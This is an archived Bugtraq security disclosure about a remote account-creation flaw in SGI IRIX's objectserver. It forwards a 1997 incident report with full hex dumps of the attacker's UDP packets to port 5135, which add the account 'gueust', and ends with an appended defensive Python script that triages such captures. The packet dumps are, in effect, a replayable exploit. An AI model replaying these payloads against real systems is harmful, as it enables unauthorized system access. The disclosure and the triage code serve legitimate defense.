Bugtraq mailing list archives
Objectserver vulnerability
From: hmkash () ARL MIL (Howard M. Kash III)
Date: Wed, 29 Mar 2000 08:52:06 EST
Since the patches are now officially released, I feel I can finally release the details of the SGI objectserver vulnerability. This vulnerability was initially reported to CERT and SGI Security on October 6, 1997. A beta version of patch 2849 was provided in February 1998.

Howard

----- Forwarded message # 1:

Date: Mon, 6 Oct 97 7:09:51 EDT
From: "Howard M. Kash III"
To: cert () cert org, security-alert () sgi com
Subject: URGENT - new SGI vulnerability

-----BEGIN PGP SIGNED MESSAGE-----

URGENT * URGENT * URGENT * URGENT * URGENT * URGENT * URGENT * URGENT

SGI objectserver vulnerability allows remote users to create accounts.

Yesterday two of our hosts were compromised by an (as far as I could determine) unknown, unpatched bug in SGI's objectserver. The attack consisted of sending UDP packets to port 5135 (see below). The result was a non-root account being added to the system. The two compromised hosts were running IRIX 6.2, but the vulnerability may affect other versions of IRIX. The vulnerability does not appear to give root access directly, as the attackers used other IRIX vulnerabilities to gain root access after logging into the new account.

Attached are the UDP packets exchanged between the attacking host (aaa.aaa.aaa.aaa) and the target host (ttt.ttt.ttt.ttt). IP addresses have been masked to protect the guilty - I mean innocent until proven guilty.

The result of this sequence of packets is the following line added to /etc/passwd:

gueust:x:5002:20:LsD:/tmp/.new:/bin/csh

An entry must also be added to /etc/shadow since the attacker then logs into the new account with a password.

As a temporary measure we have blocked all traffic to port 5135 at our gateway.

Howard Kash
U.S. Army Research Lab

- ------------------------------------------------------------------------

TCP and UDP headers have been separated out. I've decoded some of the packet contents into their ASCII equivalents below the line.
16:52:00.631310 aaa.aaa.aaa.aaa.4394 > ttt.ttt.ttt.ttt.5135: udp 52
4500 0050 7d95 0000 2a11 bfb5 aaaa aaaa
tttt tttt 112a 140f 003c 6516 0001 0000
0001 0000 0000 0024 0000 0000 2103 0043
000a 000a 0101 3b01 6e00 0080 4301 0118
0b01 013b 016e 0102 0103 0001 0107 0101

16:52:00.638455 ttt.ttt.ttt.ttt.5135 > aaa.aaa.aaa.aaa.4394: udp 95
4500 007b 0644 0000 3a11 26dc tttt tttt
aaaa aaaa 140f 112a 0067 0d37 0001 0186
0001 0000 0000 004f 0000 0000 2903 0043
000a 0080 4300 8043 0105 0a01 013b 0178
0469 0a79 9a01 330a 0101 3b01 7804 690a
799a 0138 0a01 013b 0178 0469 0a79 9a01
020a 0101 3b01 7804 690a 799a 0103 0a01
013b 0178 0469 0a79 9a01 04

16:52:00.794985 aaa.aaa.aaa.aaa.4394 > ttt.ttt.ttt.ttt.5135: udp 312
4500 0154 7da3 0000 2a11 bea3 aaaa aaaa
tttt tttt 112a 140f 0140 a1b2 0001 0000
0001 0000 0000 0128 0000 0000 1c03 0043
0201 1d0a 0101 3b01 7804 690a 799a 0102
0a01 013b 0178 0000 8043 0110 170b 0101
3b01 6e01 0101 0943 0106 6775 6575 7374
                         g u e u s t
170b 0101 3b01 0201 0101 0943 0103 4c73
                                   L s
4417 0b01 013b 016e 0106 0109 4300 170b
D
0101 3b01 6e01 0701 0943 0017 0b01 013b
0102 0103 0109 4300 170b 0101 3b01 6e01
0901 0943 0017 0b01 013b 016e 010d 0109
4300 170b 0101 3b01 6e01 1001 0943 0017
0b01 013b 016e 010a 0109 4300 170b 0101
3b01 6e01 0e01 0301 0917 0b01 013b 016e
0104 0109 4301 0d61 6b46 4a64 7865 6e4b
6e79 532e 170b 0101 3b01 6e01 1101 0943
0109 2f74 6d70 2f2e 6e65 7717 0b01 013b
     / t m p / . n e w
016e 0112 0109 4301 0470 6f6f 7417 0b01
013b 016e 0102 0103 0017 0b01 013b 016e
0113 0109 4301 082f 6269 6e2f 6373 6817
                 / b i n / c s h
0b01 013b 016e 010f 0109 4301 074c 7344
2f43 5444

16:52:00.921356 ttt.ttt.ttt.ttt.5135 > aaa.aaa.aaa.aaa.4394: udp 41
4500 0045 0646 0000 3a11 2710 tttt tttt
aaaa aaaa 140f 112a 0031 0ef5 0001 0187
0001 0000 0000 0019 0000 0000 2503 0043
0201 1d0a 0080 4300 0a01 013b 0178 0469
0a79 9a01 39

16:53:33.226155 aaa.aaa.aaa.aaa.4399 > ttt.ttt.ttt.ttt.5135: udp 52
4500 0050 8f33 0000 2a11 ae17 aaaa aaaa
tttt tttt 112f 140f 003c 6511 0001 0000
0001 0000 0000 0024 0000 0000 2103 0043
000a 000a 0101 3b01 6e00 0080 4301 0118
0b01 013b 016e 0102 0103 0001 0107 0101

16:53:33.232248 ttt.ttt.ttt.ttt.5135 > aaa.aaa.aaa.aaa.4399: udp 108
4500 0088 0669 0000 3a11 26aa tttt tttt
aaaa aaaa 140f 112f 0074 3f4f 0001 0188
0001 0000 0000 005c 0000 0000 2903 0043
000a 0080 4300 8043 0106 0a01 013b 0178
0469 0a79 9a01 330a 0101 3b01 7804 690a
799a 0138 0a01 013b 0178 0469 0a79 9a01
390a 0101 3b01 7804 690a 799a 0102 0a01
013b 0178 0469 0a79 9a01 030a 0101 3b01
7804 690a 799a 0104

16:53:33.420972 aaa.aaa.aaa.aaa.4399 > ttt.ttt.ttt.ttt.5135: udp 314
4500 0156 8f3e 0000 2a11 ad06 aaaa aaaa
tttt tttt 112f 140f 0142 1399 0001 0000
0001 0000 0000 012a 0000 0000 1c03 0043
0201 1d0a 0101 3b01 7804 690a 799a 0102
0a01 013b 0178 0000 8043 0110 170b 0101
3b01 6e01 0101 0943 0106 6775 6575 7374
170b 0101 3b01 0201 0101 0943 0103 4c73
4417 0b01 013b 016e 0106 0109 4300 170b
0101 3b01 6e01 0701 0943 0017 0b01 013b
0102 0103 0109 4300 170b 0101 3b01 6e01
0901 0943 0017 0b01 013b 016e 010d 0109
4300 170b 0101 3b01 6e01 1001 0943 0017
0b01 013b 016e 010a 0109 4300 170b 0101
3b01 6e01 0e01 0301 0917 0b01 013b 016e
0104 0109 4301 0d61 6b46 4a64 7865 6e4b
6e79 532e 170b 0101 3b01 6e01 1101 0943
0109 2f74 6d70 2f2e 6e65 7717 0b01 013b
016e 0112 0109 4301 0475 7365 7217 0b01
013b 016e 0102 0103 0213 8a17 0b01 013b
016e 0113 0109 4301 082f 6269 6e2f 6373
6817 0b01 013b 016e 010f 0109 4301 074c
7344 2f43 5444

16:53:33.580619 ttt.ttt.ttt.ttt.5135 > aaa.aaa.aaa.aaa.4399: udp 41
4500 0045 0671 0000 3a11 26e5 tttt tttt
aaaa aaaa 140f 112f 0031 0dee 0001 0189
0001 0000 0000 0019 0000 0000 2503 0043
0201 1d0a 0080 4300 0a01 013b 0178 0469
0a79 9a01 3a

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBNDjGrKDxPoYWV34tAQGVJwQA0OHHlupV1LDF6bFcnWuNfnancEmSs8ee
nF1LRhJrxnniPYI05xZ6aR5OIgtwVFtlAxDdWsgKxuuu3k/CTnSMA3ObsTG1GW1w
I7AXwNmKMUGCglVv6evDHXWbwR6uao//8c/Hfi1s09d/jZIiy2zFm4Gnrkw0sGj+
n9jE26XP5HU=
=yKsl
-----END PGP SIGNATURE-----

----- End of forwarded messages
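A way to triage a capture of this kind, as an added example that is not part of the post: the script below parses a tcpdump-style hex dump like the one above (assumed format: a "HH:MM:SS.us src.port > dst.port: udp N" header line followed by lines of 16-bit hex words, with masked addresses such as "tttt" zeroed and the author's one-letter ASCII annotations skipped), checks the IP and UDP header fields against the byte count, and extracts printable strings so a responder can spot login-shell and home-directory values being carried to UDP port 5135. The sample input repeats the first request packet from the post and adds one constructed packet with documentation addresses; the port number, the path prefixes treated as account indicators, and the function names are this example's assumptions. Checksums are not verified.

```python
"""Triage a tcpdump-style hex dump of UDP packets (added example, not the
post's own code). Each packet is rebuilt from its hex words; header fields are
checked against the byte count and the printed header line; printable strings
that look like an account being written (login shell, home directory) are
reported. Checksums are not verified."""
import re
import struct
from dataclasses import dataclass

OBJECTSERVER_PORT = 5135  # the port named in the advisory (assumption: IRIX objectserver)

HEADER_RE = re.compile(
    r"^(?P<ts>\d\d:\d\d:\d\d\.\d+)\s+(?P<src>\S+)\.(?P<sport>\d+)\s+>\s+"
    r"(?P<dst>\S+)\.(?P<dport>\d+):\s+udp\s+(?P<ulen>\d+)\s*$"
)
HEX_WORD_RE = re.compile(r"^[0-9a-f]{2}(?:[0-9a-f]{2})?$")   # one or two bytes
MASKED_RE = re.compile(r"^[a-z]{2}(?:[a-z]{2})?$")            # e.g. "tttt"
PRINTABLE_RE = re.compile(rb"[\x20-\x7e]{4,}")
ACCOUNT_PATH_PREFIXES = ("/bin/", "/usr/bin/", "/sbin/", "/tmp/")  # assumed indicators


@dataclass
class Packet:
    ts: str
    src: str
    sport: int
    dst: str
    dport: int
    udp_len: int        # payload length as printed on the header line
    raw: bytes          # IP header + UDP header + payload, masked words zeroed
    masked_words: int

    @property
    def payload(self) -> bytes:
        return self.raw[28:]    # 20-byte IP header (no options) + 8-byte UDP header

    def consistent(self) -> bool:
        """Header fields must agree with the byte count and the header line."""
        if len(self.raw) < 28 or self.raw[0] != 0x45 or self.raw[9] != 17:
            return False
        (ip_total,) = struct.unpack("!H", self.raw[2:4])
        sport, dport, udp_total = struct.unpack("!HHH", self.raw[20:26])
        return (ip_total == len(self.raw) and udp_total == 8 + self.udp_len
                and len(self.payload) == self.udp_len
                and (sport, dport) == (self.sport, self.dport))

    def strings(self) -> list:
        return [m.group().decode("ascii") for m in PRINTABLE_RE.finditer(self.payload)]

    def account_indicators(self) -> list:
        """Strings that look like a login shell or home directory being set."""
        return [s for s in self.strings() if s.startswith(ACCOUNT_PATH_PREFIXES)]


def parse_dump(text: str) -> list:
    packets, current, words, masked = [], None, [], 0

    def flush():
        if current is not None:
            packets.append(Packet(**current, raw=b"".join(words), masked_words=masked))

    for line in text.splitlines():
        m = HEADER_RE.match(line.strip())
        if m:
            flush()
            current = dict(ts=m["ts"], src=m["src"], sport=int(m["sport"]),
                           dst=m["dst"], dport=int(m["dport"]), udp_len=int(m["ulen"]))
            words, masked = [], 0
            continue
        for tok in line.split():
            if HEX_WORD_RE.match(tok):
                words.append(bytes.fromhex(tok))
            elif MASKED_RE.match(tok):       # masked octets: keep width, zero value
                words.append(bytes(len(tok) // 2))
                masked += 1
            # anything else is an ASCII annotation, not packet data
    flush()
    return packets


def triage(text: str) -> list:
    """One summary per packet; 'flag' marks traffic to the objectserver port
    whose payload carries an account-shaped string."""
    rows = []
    for p in parse_dump(text):
        rows.append({"ts": p.ts, "src": f"{p.src}:{p.sport}", "dst": f"{p.dst}:{p.dport}",
                     "consistent": p.consistent(), "masked_words": p.masked_words,
                     "strings": p.strings(),
                     "flag": p.dport == OBJECTSERVER_PORT and bool(p.account_indicators())})
    return rows


# Constructed sample: the first packet is the initial request copied from the
# post (addresses masked as in the original); the second is made up here, with
# documentation addresses and zero checksums, so the indicator check has a hit.
SAMPLE_DUMP = """\
16:52:00.631310 aaa.aaa.aaa.aaa.4394 > ttt.ttt.ttt.ttt.5135: udp 52
4500 0050 7d95 0000 2a11 bfb5 aaaa aaaa
tttt tttt 112a 140f 003c 6516 0001 0000
0001 0000 0000 0024 0000 0000 2103 0043
000a 000a 0101 3b01 6e00 0080 4301 0118
0b01 013b 016e 0102 0103 0001 0107 0101
16:52:01.000000 192.0.2.10.1234 > 192.0.2.20.5135: udp 21
4500 0031 0001 0000 4011 0000 c000 020a
c000 0214 04d2 140f 001d 0000 0109 2f74
6d70 2f2e 6e65 7701 082f 6269 6e2f 6373
68
"""

if __name__ == "__main__":
    for row in triage(SAMPLE_DUMP):
        print(row)
```

Feed it the full dump from the post and every packet should come back consistent with its printed length, which is a quick check that the hex was transcribed whole; the flag only fires on the packets that carry path-shaped strings toward port 5135, which is the behaviour a port-5135 block at the gateway, as the post describes, would suppress.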